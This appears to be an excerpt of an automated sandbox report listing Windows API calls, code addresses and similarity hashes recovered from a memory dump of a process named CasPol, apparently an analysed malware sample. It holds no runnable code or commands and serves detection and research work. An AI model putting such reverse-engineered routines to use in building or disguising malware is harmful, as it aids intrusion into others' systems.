  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
• Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
• Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
• Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
• Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
APIs
• SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
• Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
• Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
• Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
• Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
• Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
• Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
• Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
• Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
APIs
• FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
• Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
• Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
• Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
APIs
• ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
• Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
• Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
• Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
APIs
• WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
• Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
• Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
• Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3334572018-0
                                                                                                                                                                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
• String ID:
• API String ID: 3655998216-0
APIs
• memset.MSVCRT ref: 00445426
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
• String ID:
• API String ID: 1828521557-0
APIs
  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastRead
• String ID:
• API String ID: 2136311172-0
APIs
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
APIs
Memory Dump Source
• Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0